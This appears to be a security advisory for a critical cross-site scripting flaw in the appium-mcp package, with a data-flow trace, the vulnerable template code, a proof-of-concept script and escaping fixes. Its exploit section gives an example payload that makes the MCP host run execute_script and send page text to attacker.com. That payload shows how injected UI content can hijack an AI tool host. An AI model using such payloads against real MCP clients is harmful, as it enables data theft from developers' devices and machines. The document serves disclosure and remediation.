Appium-MCP, Cross-Site Scripting (XSS), VULN-001 (Critical) -DC-Jun2026-516

How VULN-001 Works

The `appium-mcp` package provides AI-assisted mobile automation tools. The `createLocatorGeneratorUI` function, found in `src/ui/mcp-ui-utils.ts` at lines 730–740, is responsible for generating an HTML user interface that displays element locators.
This function builds an HTML string using template literals. It interpolates several values directly into this HTML without any sanitization:
– `element.text`
– `element.contentDesc`
– `element.resourceId`
– The `selector` string
– The `strategy` string
The values for `text`, `content-desc`, and `resource-id` originate from an XML page source provided by an Appium session. An attacker who controls the UI of the application under test can inject malicious HTML and JavaScript code into these attributes. The data flow is as follows:
1. Source: `src/tools/test-generation/locators.ts:57` reads the page source XML from the Appium session. The connected app is attacker-controlled.
2. Parsing: `src/locators/source-parsing.ts:108` processes the XML. It only replaces newline characters (`\n`) and does not re-encode HTML entities like `&lt;`, which are decoded into raw characters by the XML parser.
3. Extraction: `src/locators/generate-all-locators.ts:73–75` copies the text, content-desc, and `resource-id` attributes verbatim into the locator result object.
4. UI Generation: `src/tools/test-generation/locators.ts:90` passes these locator objects to `createLocatorGeneratorUI`.
5. Sink: `src/ui/mcp-ui-utils.ts:730–740` interpolates the unsanitized values directly into the HTML response.
This lack of escaping allows an attacker to break out of the HTML context and inject arbitrary scripts. The `onclick` attribute in the generated UI also embeds the `selector` and `strategy` values, using only backtick escaping, which is insufficient to prevent injection.
When a victim’s MCP client renders this HTML resource (e.g., in a WebView or iframe), the injected JavaScript executes. The `window.parent.postMessage` mechanism, used throughout `src/ui/mcp-ui-utils.ts`, then allows this injected script to invoke any registered MCP tool. This can lead to unauthorized actions such as taking screenshots, reading page sources, or executing scripts on the device.
A key detail is that the `createPageSourceInspectorUI` function in `src/ui/mcp-ui-utils.ts:911–916` does apply proper escaping, confirming that this vulnerability is an oversight rather than an architectural choice.

DailyCVE Form

Platform: Appium-MCP
Version: v1.85.8, v1.85.9
Vulnerability: Cross-Site Scripting (XSS)
Severity: Critical
Date: 2026-06-19
Prediction: 2026-07-03

What Undercode Say: Analytics

The vulnerability stems from a failure to apply context-appropriate escaping. The `createLocatorGeneratorUI` function directly embeds attacker-controlled strings into an HTML template, creating a classic XSS sink.

Vulnerable Code Snippet (src/ui/mcp-ui-utils.ts:730–740):

```ts
${element.text ? `<p class="element-text"><strong>Text:</strong> ${element.text}</p>` : ''}
${element.contentDesc ? `<p class="element-text"><strong>Content Desc:</strong> ${element.contentDesc}</p>` : ''}
${element.resourceId ? `<p class="element-text"><strong>Resource ID:</strong> <code>${element.resourceId}</code></p>` : ''}
<code>${selector}</code>
<button class="test-btn" onclick="testLocator('${strategy}', `${selector.replace(/`/g, '\\`')}`)">Test</button>
```

Static Confirmation (No Appium Session Required):

```bash
node --input-type=module <<'EOF'
import { generateAllElementLocators } from './dist/locators/generate-all-locators.js';
import { createLocatorGeneratorUI } from './dist/ui/mcp-ui-utils.js';
// Page source XML with markup placed in the three attributes that reach the sink
const xml = `<hierarchy>
<node class="android.widget.TextView"
clickable="true"
enabled="true"
displayed="true"
text="<img src=x onerror=\"window.parent.postMessage({type:'tool',payload:{toolName:'appium_screenshot',params:{}},'')\">"
content-desc="<b>xss-in-contentDesc</b>"
resource-id="com.attacker.app/<u>xss-resource-id</u>"/>
</hierarchy>`;
const locators = generateAllElementLocators(xml, true, 'uiautomator2', { fetchableOnly: true });
const html = createLocatorGeneratorUI(locators);
// Each check is true when the markup survives unescaped in the generated HTML
console.log('UNESCAPED <img src=x onerror= present:', html.includes('<img src=x onerror='));
console.log('UNESCAPED <b> in contentDesc present: ', html.includes('<b>xss-in-contentDesc</b>'));
console.log('UNESCAPED <u> in resourceId present: ', html.includes('<u>xss-resource-id</u>'));
EOF
```

Expected Output:

```
UNESCAPED <img src=x onerror= present: true
UNESCAPED <b> in contentDesc present: true
UNESCAPED <u> in resourceId present: true
```

Dynamic Confirmation (Docker, Network-Isolated):

```bash
# Build context is the parent directory (contains repo/ and vuln-001/)
docker build -t appium-mcp-vuln-001 \
  -f vuln-001/Dockerfile \
  reports/npmAI_303_appium__appium-mcp
docker run --rm --network none appium-mcp-vuln-001
```

The container output confirms the XSS payload is present in the generated HTML.

Exploit:

An attacker can exploit this vulnerability by creating a malicious mobile application. The app’s UI elements (e.g., text, content-desc, resource-id) are crafted to contain an XSS payload.

Example Payload:

<img src=x onerror="window.parent.postMessage({type:'tool',payload:{toolName:'execute_script',params:{script:'fetch('http://attacker.com/steal?data='+document.body.innerText)'}},'')">

When a victim developer uses the `appium-mcp` server to connect to this malicious app and calls the `generate_locators` tool, the MCP client renders the returned HTML. The injected `onerror` handler fires, sending a crafted `postMessage` to the parent frame. This causes the MCP host to invoke the `execute_script` tool, exfiltrating data to the attacker’s server.

Protection:

Remediation requires implementing proper output encoding for all data interpolated into HTML and JavaScript contexts.
1. HTML Context Escaping: Apply an HTML-escaping helper to all element properties (text, contentDesc, resourceId, selector) before insertion. This helper must replace characters like `&`, `<`, `>`, `"`, and `'` with their corresponding HTML entities.
2. JavaScript Context Escaping: For values embedded in JavaScript string literals (e.g., inside `onclick` attributes), use `JSON.stringify` to safely encode the data.
3. Secure Coding Practice: Adopt a secure templating approach that automatically escapes content based on the context, or use a trusted library for sanitization.
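
Steps 1 and 2 applied to the vulnerable template, as an added example that is not code from the appium-mcp project. The helper names (`escapeHtml`, `jsArg`, `renderLocatorCard`, `decodeOnclickArgs`) and the sample values are assumptions; the point it adds is that a value inside `onclick="..."` sits in two contexts at once, so it needs `JSON.stringify` followed by HTML escaping.

```javascript
// Added example, not appium-mcp code. escapeHtml, jsArg, renderLocatorCard and
// decodeOnclickArgs are hypothetical names; the sample values are constructed.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// HTML context: encode the characters that can open a tag, start an entity or close a quote.
function escapeHtml(value) {
  return String(value ?? '').replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// JavaScript inside an HTML attribute: JSON.stringify yields a valid JS string
// literal, then escapeHtml protects the enclosing onclick="...". JSON.stringify
// alone is not enough, because its double quotes would close the attribute.
function jsArg(value) {
  return escapeHtml(JSON.stringify(String(value ?? '')));
}

function renderLocatorCard(element, strategy, selector) {
  const row = (label, v, wrap = (s) => s) =>
    v ? `<p class="element-text"><strong>${label}:</strong> ${wrap(escapeHtml(v))}</p>` : '';
  return [
    row('Text', element.text),
    row('Content Desc', element.contentDesc),
    row('Resource ID', element.resourceId, (s) => `<code>${s}</code>`),
    `<code>${escapeHtml(selector)}</code>`,
    `<button class="test-btn" onclick="testLocator(${jsArg(strategy)}, ${jsArg(selector)})">Test</button>`,
  ].join('\n');
}

// Mirrors what the browser does: entity-decode the attribute value, then read
// the two arguments back. They must equal the original strings exactly.
function decodeOnclickArgs(html) {
  const attr = html.match(/onclick="testLocator\(([^"]*)\)"/)[1];
  const decoded = attr.replace(/&(amp|lt|gt|quot|#39);/g, (m) =>
    Object.keys(HTML_ENTITIES).find((k) => HTML_ENTITIES[k] === m));
  return JSON.parse(`[${decoded}]`);
}

// Constructed input with harmless markers in the style of the static check above.
const sample = {
  text: '<i>xss-in-text</i>',
  contentDesc: '<b>xss-in-contentDesc</b>',
  resourceId: 'com.attacker.app/<u>xss-resource-id</u>',
};
const sampleSelector = `//*[@content-desc="a'b\`c"]`;
const sampleHtml = renderLocatorCard(sample, 'xpath', sampleSelector);
```

Running the page's three `html.includes(...)` checks against `sampleHtml` should now print `false` for each marker.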

Impact:

This is a critical Cross-Site Scripting (XSS) vulnerability. Any developer using `appium-mcp` with an MCP client that renders HTML resources is at risk when inspecting elements from an attacker-controlled application.

Potential Impact Scenarios:

– Arbitrary MCP Tool Invocation: Injected JavaScript can invoke any MCP tool, such as `appium_screenshot`, `execute_script`, or `get_page_source`, without user consent.
– Data Exfiltration: Attackers can use `execute_script` or screenshot tools to extract sensitive data from the device screen or page source.
– Lateral Movement: If the MCP host exposes file-system or shell tools, the attacker could escalate to arbitrary code execution on the developer’s machine.
– Supply Chain Attacks: Automated test pipelines that call `generate_locators` against third-party app builds are equally vulnerable.


Sources:

Reported By: github.com